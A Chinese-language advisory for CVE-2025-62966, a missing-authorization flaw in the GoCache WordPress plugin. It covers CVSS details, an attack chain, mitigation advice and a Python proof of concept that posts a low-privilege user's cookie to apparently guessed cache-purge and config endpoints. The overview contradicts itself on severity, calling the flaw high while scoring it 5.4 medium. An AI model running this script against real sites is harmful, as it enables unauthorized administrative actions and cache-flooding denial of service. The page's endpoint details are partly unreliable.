CVE-2025-62966 Apiki GoCache WordPress插件缺失授权漏洞

漏洞信息

漏洞编号

CVE-2025-62966

漏洞类型

缺失授权/访问控制

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Apiki GoCache (gocache-cdn) WordPress插件

漏洞概述

CVE-2025-62966是Apiki GoCache WordPress插件中的一个高危安全漏洞，属于缺失授权（Missing Authorization）类型。该漏洞存在于gocache-cdn插件的访问控制机制中，由于插件在处理用户请求时未能正确验证用户权限，攻击者可以利用错误配置的访问控制安全级别进行未授权操作。此漏洞影响从任意版本到1.3.6的所有插件版本。攻击者仅需拥有低权限账户（如订阅者角色）即可利用此漏洞，绕过后台管理员设置的访问控制策略，访问或修改本应受保护的资源。该漏洞由Patchstack安全团队审计发现并报告，CVSS 3.1评分5.4，属于中等严重程度。建议用户立即升级到最新版本以修复此安全问题。

技术细节

该漏洞根本原因在于Apiki GoCache插件的WordPress插件在实现访问控制检查时存在缺陷。具体来说，插件的某些关键功能端点缺少适当的权限验证检查（capability checks），导致低权限用户可以执行本应仅限管理员或高级用户操作的功能。攻击者可以通过构造特定的HTTP请求，直接访问管理功能接口，如缓存清除、配置修改等敏感操作。由于WordPress的REST API默认注册了多个路由，且插件可能未对所有路由实施基于用户角色的访问控制，因此攻击者可以利用这一点进行横向权限提升。建议开发者使用current_user_can()函数对所有管理功能进行权限检查，确保操作执行前验证用户的编辑帖子、删除帖子或管理选项等相应权限。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标WordPress网站并确认安装了gocache-cdn插件（版本<=1.3.6）

STEP 2

2

获取低权限账户：攻击者注册普通用户账户（如订阅者角色）或利用已有低权限账户

STEP 3

3

构造恶意请求：攻击者构造针对插件REST API端点的HTTP请求，尝试访问管理功能

STEP 4

4

绕过授权检查：由于插件缺少current_user_can()权限验证，请求被错误处理

STEP 5

5

执行未授权操作：攻击者成功执行缓存清除、配置修改等管理员操作

STEP 6

6

扩大攻击影响：通过反复清除缓存造成DoS，或修改配置窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-62966 PoC - Missing Authorization in Apiki GoCache WordPress Plugin
# Target: WordPress site with gocache-cdn plugin <= 1.3.6

def exploit_gocache(target_url, auth_cookie):
    """
    Exploit missing authorization vulnerability in GoCache CDN plugin.
    This PoC demonstrates accessing admin-only cache purge functionality
    as a low-privilege user.
    """
    
    # Target plugin endpoints that should require admin privileges
    endpoints = [
        '/wp-json/gocache/v1/clear',
        '/wp-json/gocache/v1/purge',
        '/wp-json/gocache/v1/config',
        '/wp-admin/admin-ajax.php?action=gocache_clear'
    ]
    
    headers = {
        'Cookie': auth_cookie,
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    print(f"[*] Testing GoCache plugin endpoints on {target_url}")
    print(f"[*] Using authentication cookie: {auth_cookie}")
    print("=" * 60)
    
    for endpoint in endpoints:
        full_url = target_url.rstrip('/') + endpoint
        try:
            response = requests.post(full_url, headers=headers, timeout=10)
            print(f"\n[>] Endpoint: {endpoint}")
            print(f"    Status Code: {response.status_code}")
            print(f"    Response: {response.text[:200]}...")
            
            # Check if unauthorized access was successful
            if response.status_code == 200:
                print(f"    [!] VULNERABLE - Low privilege user can access this endpoint!")
            elif response.status_code == 403:
                print(f"    [+] Protected - Access denied (expected behavior)")
            else:
                print(f"    [*] Unexpected response")
        except requests.RequestException as e:
            print(f"[!] Request failed for {endpoint}: {e}")

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_62966.py <target_url> <auth_cookie>")
        print("Example: python cve_2025_62966.py http://example.com 'wordpress_logged_in_xxx='")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_gocache(target, cookie)

影响范围

Apiki GoCache (gocache-cdn) <= 1.3.6

所有从n/a版本至1.3.6的版本均受影响

防御指南

临时缓解措施

作为临时缓解措施，可以暂时禁用gocache-cdn插件直到完成安全更新，或使用Web应用防火墙（WAF）规则限制对插件相关API端点的访问。同时应审查所有用户账户权限，确保不存在不必要的低权限账户。如果无法立即升级，可通过.htaccess或Nginx配置限制对/wp-json/gocache/路径的访问，仅允许管理员IP访问。